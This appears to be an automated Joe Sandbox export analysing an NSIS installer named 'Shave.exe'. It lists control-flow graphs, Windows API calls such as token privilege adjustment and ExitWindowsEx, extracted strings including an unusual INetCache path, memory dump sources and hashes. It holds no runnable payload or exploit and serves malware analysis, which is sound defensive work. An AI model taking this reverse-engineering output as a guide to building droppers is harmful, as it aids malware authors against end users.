GlobalFree 5702->5708 5703->5700 5704->5702 5705->5708 5706->5702 5707->5702 5708->5702 5709 4014b8 5710 4014be 5709->5710 5711 401389 2 API calls 5710->5711 5712 4014c6 5711->5712 5713 4046b8 5714 4046c8 5713->5714 5715 4046ee 5713->5715 5717 40420e 18 API calls 5714->5717 5716 404275 8 API calls 5715->5716 5719 4046fa 5716->5719 5718 4046d5 SetDlgItemTextW 5717->5718 5718->5715 5720 401db9 GetDC 5721 402c1f 17 API calls 5720->5721 5722 401dcb GetDeviceCaps MulDiv ReleaseDC 5721->5722 5723 402c1f 17 API calls 5722->5723 5724 401dfc 5723->5724 5725 4062b9 17 API calls 5724->5725 5726 401e39 CreateFontIndirectW 5725->5726 5727 402592 5726->5727 5728 40283b 5729 402843 5728->5729 5730 402847 FindNextFileW 5729->5730 5732 402859 5729->5732 5730->5732 5731 4029e6 5732->5731 5734 406297 lstrcpynW 5732->5734 5734->5731 5735 40543e 5736 4055e8 5735->5736 5737 40545f GetDlgItem GetDlgItem GetDlgItem 5735->5737 5739 4055f1 GetDlgItem CreateThread CloseHandle 5736->5739 5740 405619 5736->5740 5780 404243 SendMessageW 5737->5780 5739->5740 5742 405644 5740->5742 5743 405630 ShowWindow ShowWindow 5740->5743 5744 405669 5740->5744 5741 4054cf 5747 4054d6 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5741->5747 5745 4056a4 5742->5745 5749 405658 5742->5749 5750 40567e ShowWindow 5742->5750 5782 404243 SendMessageW 5743->5782 5746 404275 8 API calls 5744->5746 5745->5744 5755 4056b2 SendMessageW 5745->5755 5761 405677 5746->5761 5753 405544 5747->5753 5754 405528 SendMessageW SendMessageW 5747->5754 5756 4041e7 SendMessageW 5749->5756 5751 405690 5750->5751 5752 40569e 5750->5752 5757 4052ff 24 API calls 5751->5757 5758 4041e7 SendMessageW 5752->5758 5759 405557 5753->5759 5760 405549 SendMessageW 5753->5760 5754->5753 5755->5761 5762 4056cb CreatePopupMenu 5755->5762 5756->5744 5757->5752 5758->5745 5764 40420e 18 API calls 5759->5764 5760->5759 5763 4062b9 17 API calls 5762->5763 5765 4056db AppendMenuW 5763->5765 5766 405567 5764->5766 5767 4056f8 GetWindowRect 5765->5767 5768 40570b TrackPopupMenu 5765->5768 5769 405570 ShowWindow 5766->5769 5770 4055a4 GetDlgItem SendMessageW 5766->5770 5767->5768 5768->5761 5772 405726 5768->5772 5773 405593 5769->5773 5774 405586 ShowWindow 5769->5774 5770->5761 5771 4055cb SendMessageW SendMessageW 5770->5771 5771->5761 5775 405742 SendMessageW 5772->5775 5781 404243 SendMessageW 5773->5781 5774->5773 5775->5775 5776 40575f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5775->5776 5778 405784 SendMessageW 5776->5778 5778->5778 5779 4057ad GlobalUnlock SetClipboardData CloseClipboard 5778->5779 5779->5761 5780->5741 5781->5770 5782->5742

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 40336c-4033a9 SetErrorMode GetVersion 1 4033ab-4033b3 call 406671 0->1 2 4033bc 0->2 1->2 7 4033b5 1->7 3 4033c1-4033d5 call 406601 lstrlenA 2->3 9 4033d7-4033f3 call 406671 * 3 3->9 7->2 16 403404-403463 #17 OleInitialize SHGetFileInfoW call 406297 GetCommandLineW call 406297 9->16 17 4033f5-4033fb 9->17 24 403465-40346c 16->24 25 40346d-403487 call 405b99 CharNextW 16->25 17->16 21 4033fd 17->21 21->16 24->25 28 40348d-403493 25->28 29 40359e-4035b8 GetTempPathW call 40333b 25->29 31 403495-40349a 28->31 32 40349c-4034a0 28->32 36 403610-40362a DeleteFileW call 402edd 29->36 37 4035ba-4035d8 GetWindowsDirectoryW lstrcatW call 40333b 29->37 31->31 31->32 34 4034a2-4034a6 32->34 35 4034a7-4034ab 32->35 34->35 38 4034b1-4034b7 35->38 39 40356a-403577 call 405b99 35->39 57 403630-403636 36->57 58 4036db-4036eb call 4038ad OleUninitialize 36->58 37->36 54 4035da-40360a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40333b 37->54 40 4034d2-40350b 38->40 41 4034b9-4034c1 38->41 55 403579-40357a 39->55 56 40357b-403581 39->56 47 403528-403562 40->47 48 40350d-403512 40->48 45 4034c3-4034c6 41->45 46 4034c8 41->46 45->40 45->46 46->40 47->39 53 403564-403568 47->53 48->47 52 403514-40351c 48->52 62 403523 52->62 63 40351e-403521 52->63 53->39 64 403589-403597 call 406297 53->64 54->36 54->58 55->56 56->28 66 403587 56->66 59 4036cb-4036d2 call 403987 57->59 60 40363c-403647 call 405b99 57->60 75 403811-403817 58->75 76 4036f1-403701 call 4058fd ExitProcess 58->76 74 4036d7 59->74 77 403695-40369f 60->77 78 403649-40367e 60->78 62->47 63->47 63->62 67 40359c 64->67 66->67 67->29 74->58 80 403895-40389d 75->80 81 403819-40382f GetCurrentProcess OpenProcessToken 75->81 85 4036a1-4036af call 405c74 77->85 86 403707-40371b call 405868 lstrcatW 77->86 82 403680-403684 78->82 83 4038a3-4038a7 ExitProcess 80->83 84 40389f 80->84 88 403831-40385f LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403865-403873 call 406671 81->89 90 403686-40368b 82->90 91 40368d-403691 82->91 84->83 85->58 101 4036b1-4036c7 call 406297 * 2 85->101 102 403728-403742 lstrcatW lstrcmpiW 86->102 103 40371d-403723 lstrcatW 86->103 88->89 99 403881-40388c ExitWindowsEx 89->99 100 403875-40387f 89->100 90->91 96 403693 90->96 91->82 91->96 96->77 99->80 104 40388e-403890 call 40140b 99->104 100->99 100->104 101->59 102->58 106 403744-403747 102->106 103->102 104->80 107 403750 call 40584b 106->107 108 403749-40374e call 4057ce 106->108 117 403755-403763 SetCurrentDirectoryW 107->117 108->117 118 403770-403799 call 406297 117->118 119 403765-40376b call 406297 117->119 123 40379e-4037ba call 4062b9 DeleteFileW 118->123 119->118 126 4037fb-403803 123->126 127 4037bc-4037cc CopyFileW 123->127 126->123 128 403805-40380c call 40605d 126->128 127->126 129 4037ce-4037ee call 40605d call 4062b9 call 405880 127->129 128->58 129->126 138 4037f0-4037f7 CloseHandle 129->138 138->126
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNELBASE ref: 0040338F
                                                                                                                                • GetVersion.KERNEL32 ref: 00403395
                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
                                                                                                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040340C
                                                                                                                                • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
                                                                                                                                • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Shave.exe",00000020,"C:\Users\user\Desktop\Shave.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
                                                                                                                                  • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                  • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
                                                                                                                                • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
                                                                                                                                  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
                                                                                                                                • ExitProcess.KERNEL32 ref: 00403701
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shave.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shave.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shave.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shave.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
                                                                                                                                • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Shave.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
                                                                                                                                • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
                                                                                                                                • ExitProcess.KERNEL32 ref: 004038A7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                • String ID: "C:\Users\user\Desktop\Shave.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shave.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                • API String ID: 3441113951-1575198338
                                                                                                                                • Opcode ID: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
                                                                                                                                • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
                                                                                                                                • Opcode Fuzzy Hash: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
                                                                                                                                • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 139 404c7b-404cc7 GetDlgItem * 2 140 404ee8-404eef 139->140 141 404ccd-404d61 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 404ef1-404f01 140->142 143 404f03 140->143 144 404d70-404d77 DeleteObject 141->144 145 404d63-404d6e SendMessageW 141->145 146 404f06-404f0f 142->146 143->146 147 404d79-404d81 144->147 145->144 148 404f11-404f14 146->148 149 404f1a-404f20 146->149 150 404d83-404d86 147->150 151 404daa-404dae 147->151 148->149 152 404ffe-405005 148->152 155 404f22-404f29 149->155 156 404f2f-404f36 149->156 153 404d88 150->153 154 404d8b-404da8 call 4062b9 SendMessageW * 2 150->154 151->147 157 404db0-404ddc call 40420e * 2 151->157 162 405076-40507e 152->162 163 405007-40500d 152->163 153->154 154->151 155->152 155->156 159 404f38-404f3b 156->159 160 404fab-404fae 156->160 195 404de2-404de8 157->195 196 404ea7-404eba GetWindowLongW SetWindowLongW 157->196 168 404f46-404f5b call 404bc9 159->168 169 404f3d-404f44 159->169 160->152 164 404fb0-404fba 160->164 166 405080-405086 SendMessageW 162->166 167 405088-40508f 162->167 171 405013-40501d 163->171 172 40525e-405270 call 404275 163->172 174 404fca-404fd4 164->174 175 404fbc-404fc8 SendMessageW 164->175 166->167 176 405091-405098 167->176 177 4050c3-4050ca 167->177 168->160 194 404f5d-404f6e 168->194 169->160 169->168 171->172 180 405023-405032 SendMessageW 171->180 174->152 182 404fd6-404fe0 174->182 175->174 183 4050a1-4050a8 176->183 184 40509a-40509b ImageList_Destroy 176->184 187 405220-405227 177->187 188 4050d0-4050dc call 4011ef 177->188 180->172 189 405038-405049 SendMessageW 180->189 190 404ff1-404ffb 182->190 191 404fe2-404fef 182->191 192 4050b1-4050bd 183->192 193 4050aa-4050ab GlobalFree 183->193 184->183 187->172 200 405229-405230 187->200 214 4050ec-4050ef 188->214 215 4050de-4050e1 188->215 198 405053-405055 189->198 199 40504b-405051 189->199 190->152 191->152 192->177 193->192 194->160 203 404f70-404f72 194->203 204 404deb-404df2 195->204 202 404ec0-404ec4 196->202 206 405056-40506f call 401299 SendMessageW 198->206 199->198 199->206 200->172 201 405232-40525c ShowWindow GetDlgItem ShowWindow 200->201 201->172 208 404ec6-404ed9 ShowWindow call 404243 202->208 209 404ede-404ee6 call 404243 202->209 210 404f74-404f7b 203->210 211 404f85 203->211 212 404e88-404e9b 204->212 213 404df8-404e20 204->213 206->162 208->172 209->140 222 404f81-404f83 210->222 223 404f7d-404f7f 210->223 226 404f88-404fa4 call 40117d 211->226 212->204 217 404ea1-404ea5 212->217 224 404e22-404e58 SendMessageW 213->224 225 404e5a-404e5c 213->225 218 405130-405154 call 4011ef 214->218 219 4050f1-40510a call 4012e2 call 401299 214->219 227 4050e3 215->227 228 4050e4-4050e7 call 404c49 215->228 217->196 217->202 241 4051f6-40520a InvalidateRect 218->241 242 40515a 218->242 249 40511a-405129 SendMessageW 219->249 250 40510c-405112 219->250 222->226 223->226 224->212 229 404e5e-404e6d SendMessageW 225->229 230 404e6f-404e85 SendMessageW 225->230 226->160 227->228 228->214 229->212 230->212 241->187 245 40520c-40521b call 404b9c call 404b84 241->245 243 40515d-405168 242->243 246 40516a-405179 243->246 247 4051de-4051f0 243->247 245->187 251 40517b-405188 246->251 252 40518c-40518f 246->252 247->241 247->243 249->218 253 405114 250->253 254 405115-405118 250->254 251->252 256 405191-405194 252->256 257 405196-40519f 252->257 253->254 254->249 254->250 259 4051a4-4051dc SendMessageW * 2 256->259 257->259 260 4051a1 257->260 259->247 260->259
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0040509B
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004050AB
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                                                                                • ShowWindow.USER32(00000000), ref: 0040525C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                • String ID: $M$N
                                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                                • Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                                                                                • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                                                                                • Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                                                                                • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 6F97121B: GlobalAlloc.KERNEL32(00000040,?,6F97123B,?,6F9712DF,00000019,6F9711BE,-000000A0), ref: 6F971225
                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F971C6F
                                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 6F971CB7
                                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 6F971CC1
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6F971CD4
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6F971DB6
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6F971DBB
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6F971DC0
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6F971FAA
                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 6F972144
                                                                                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6F9721B9
                                                                                                                                • LoadLibraryW.KERNEL32(00000008), ref: 6F9721CA
                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 6F972224
                                                                                                                                • lstrlenW.KERNEL32(00000808), ref: 6F97223E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2386745512.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2386728456.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386788272.000000006F973000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386807263.000000006F975000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_6f970000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 245916457-0
                                                                                                                                • Opcode ID: 1fd7fb93b20e84e9bb29657208738ca1191e64ba3882d05827fa26970d9105d4
                                                                                                                                • Instruction ID: bcfd2d22d1879e5622b99971d01ab4cf0f80aa437164630439a9faed4d38b060
                                                                                                                                • Opcode Fuzzy Hash: 1fd7fb93b20e84e9bb29657208738ca1191e64ba3882d05827fa26970d9105d4
                                                                                                                                • Instruction Fuzzy Hash: B6227871D18749DBDB348FB889A06EAB7B8FF06315F10462AD1A5E62C0DB70E6C58F50

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 719 4059a9-4059cf call 405c74 722 4059d1-4059e3 DeleteFileW 719->722 723 4059e8-4059ef 719->723 724 405b65-405b69 722->724 725 4059f1-4059f3 723->725 726 405a02-405a12 call 406297 723->726 727 405b13-405b18 725->727 728 4059f9-4059fc 725->728 732 405a21-405a22 call 405bb8 726->732 733 405a14-405a1f lstrcatW 726->733 727->724 731 405b1a-405b1d 727->731 728->726 728->727 734 405b27-405b2f call 4065da 731->734 735 405b1f-405b25 731->735 736 405a27-405a2b 732->736 733->736 734->724 743 405b31-405b45 call 405b6c call 405961 734->743 735->724 739 405a37-405a3d lstrcatW 736->739 740 405a2d-405a35 736->740 742 405a42-405a5e lstrlenW FindFirstFileW 739->742 740->739 740->742 744 405a64-405a6c 742->744 745 405b08-405b0c 742->745 759 405b47-405b4a 743->759 760 405b5d-405b60 call 4052ff 743->760 748 405a8c-405aa0 call 406297 744->748 749 405a6e-405a76 744->749 745->727 747 405b0e 745->747 747->727 761 405aa2-405aaa 748->761 762 405ab7-405ac2 call 405961 748->762 751 405a78-405a80 749->751 752 405aeb-405afb FindNextFileW 749->752 751->748 756 405a82-405a8a 751->756 752->744 755 405b01-405b02 FindClose 752->755 755->745 756->748 756->752 759->735 766 405b4c-405b5b call 4052ff call 40605d 759->766 760->724 761->752 763 405aac-405ab5 call 4059a9 761->763 772 405ae3-405ae6 call 4052ff 762->772 773 405ac4-405ac7 762->773 763->752 766->724 772->752 775 405ac9-405ad9 call 4052ff call 40605d 773->775 776 405adb-405ae1 773->776 775->752 776->752
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 004059D2
                                                                                                                                • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A1A
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A3D
                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A43
                                                                                                                                • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A53
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
